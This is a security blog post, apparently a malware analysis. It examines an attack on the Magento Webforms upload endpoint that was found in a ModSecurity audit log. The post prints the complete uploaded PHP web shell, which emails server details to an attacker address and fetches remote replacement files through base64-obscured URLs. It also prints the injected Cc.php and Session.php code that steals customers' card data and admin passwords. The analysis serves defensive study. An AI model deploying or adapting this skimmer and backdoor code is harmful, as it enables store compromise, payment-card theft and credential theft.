Top

Magento Webforms Upload Vulnerability

In ModSecurity auditlog we found magento webforms upload vulnerability.

--ab16e752-B--
POST /js/webforms/upload/ HTTP/1.1
User-Agent: msnbot/1.0 (+http://search.msn.com/msnbot.htm)
Host: malware.expert
Accept: */*
Content-Length: 2163
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------6a5fe0ef92e39879

Looking better POST payload, found this image.phtml script, which first uploaded to customer website. If index.php / image.phtml file success uploaded, it can access from www and executed!

image.phtml

--------------------------6a5fe0ef92e39879
Content-Disposition: form-data; name="files[]"; filename="image.phtml"
Content-Type: application/octet-stream

<?php
echo base64_decode("RmF0aHVyRnJlYWt6IFdhcyBIZXJlICE=");
$uname = php_uname();
function auto($type,$path = null, $content = null){
	$root = $_SERVER['DOCUMENT_ROOT'];
	$file = $root."/".$path;
	switch($type){
		case "PATCH":
			if(unlink($root."/js/webforms/upload/index.php")){
				echo "Patch = Success<br>";
			} else {
				echo "Patch = Failed<br>";
			}
		break;
		case "LOG":
			$write = fopen($file, "w");
			if($write){
				echo (fwrite($write,$content) ? "Write : '".$file."' [Success]<br>" : "Write : '".$file."' [Failed]<br>");
				fclose($write);
			} else {
				echo "File : '".$file."' [Not Writeable]<br>";
			}
		break;
	}
}

mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");
echo "<br>".$uname."<br>";
auto("PATCH");
auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));
auto("LOG","skin/adminhtml/default/default/xmlconnect/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","skin/adminhtml/default/default/images/remove.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
auto("LOG","shell/htaccess.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL3VwbG9hZGVyLnR4dA==")));
echo "<form method='post' enctype='multipart/form-data'><input type='file' name='file'><input type='submit' name='upload' value='upload'></form>";
if(isset($_POST['upload'])){
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])){
		echo "Success";
	} else {
		echo "Failed";
	}
}
?>
--------------------------6a5fe0ef92e39879--

 

First it send email to fileputcontent@gmail.com notify details like Hostname, URL, IP:

mail("fileputcontent@gmail.com","Shell From ".$_SERVER['HTTP_HOST'],"Direct Link : ".$_SERVER['HTTP_HOST']."".$_SERVER['REQUEST_URI']."\nInfo : ".$uname."\nIP : ".$_SERVER['SERVER_ADDR']."\n");

 

Then it try Patch magento and remove itself.

if(unlink($root."/js/webforms/upload/index.php")){

 

Finally it replace magento payment gateway Cc.php to steal customer payment details and session.php to capture admin login details.

auto("LOG","app/code/core/Mage/Payment/Model/Method/Cc.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL0NjLnR4dA==")));
auto("LOG","app/code/core/Mage/Admin/Model/Session.php",file_get_contents(base64_decode("aHR0cDovL2RhdGEuZmF0aHVyZnJlYWt6LmlkL1Nlc3Npb24udHh0")));

 

Cc.php

In Cc.php file added more code to capture customer Payment Details and send them email again. In function assignData() added more code to call another function:

public function assignData($data)
    {
    .
    .
    .
    //THIS LINE ADDED
    $this->ccNumberProccess();

 

In ccNumberProccess function steal customer payment details and send them in email to fileputcontent@gmail.com:

function ccNumberProccess()
    {
        $pay = $this->getInfoInstance();
        $object = new Mage_Checkout_Block_Onepage_Billing;
        $billing = $object->getQuote()->getBillingAddress();
		$email = Mage::getSingleton('checkout/session')->getQuote()->getBillingAddress()->getEmail();
		$setBilling = $this->setBilling($billing->getFirstname(),$billing->getLastname(),$billing->getStreet(1),$billing->getStreet(2),$billing->getCity(),$billing->getRegion(),$billing->getPostcode(),$billing->getCountry(),$billing->getTelephone(),$email);
		$invoice = "";
		foreach($setBilling as $key=>$value){
			$invoice .= $key.' = '.$value."\n";
		}
		$bin     = str_replace(' ', '', $pay->getCcNumber());
		$bin     = substr($bin, 0, 6);
		$getbank = explode($bin, file_get_contents("http://bins.pro/search?action=searchbins&bins=" . $bin . "&bank=&country="));
		$jeniscc = explode("</td><td>", $getbank[2]);
		$namabnk = explode("</td></tr>", $jeniscc[5]);
		$ccbrand = $jeniscc[2];
		$ccbank = $namabnk[0];
		$cctype = $jeniscc[3];
		$ccklas = $jeniscc[4];			
		$invoice .= "Card = ".$pay->getCcNumber()."\n";
		$invoice .= "Expired = ".$pay->getCcExpMonth()."/".substr($pay->getCcExpYear(),-2)."\n";
		$invoice .= "Security = ".$pay->getCcCid()."\n";
		$invoice .= "Site = http://".$_SERVER['HTTP_HOST']."/\n";
		$invoice .= "Date = ".date("d-m-Y h:i:s");
		$subject = $ccbank." - ".$cctype." - ".$ccklas." From ".$_SERVER['HTTP_HOST']."|".$setBilling['Country'];
		mail(base64_decode("ZmlsZXB1dGNvbnRlbnRAZ21haWwuY29t"),$subject,$invoice,"From: ".$billing->getFirstname()." ".$billing->getLastname()." <".$email.">");
		
    }

Session.php

It’s also steal magento session information (username & password) and send they with email:

public function login($username, $password, $request = null)
    {
    .
    .
    .
    //ADDED THIS LINE
    mail("fileputcontent@gmail.com","Admin From ".$_SERVER['HTTP_HOST'],"Login : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\nUsername : ".$username."\nPassword : ".$password."\nIP Log : ".$_SERVER['REMOTE_ADDR']);

, , , ,

Comments are closed.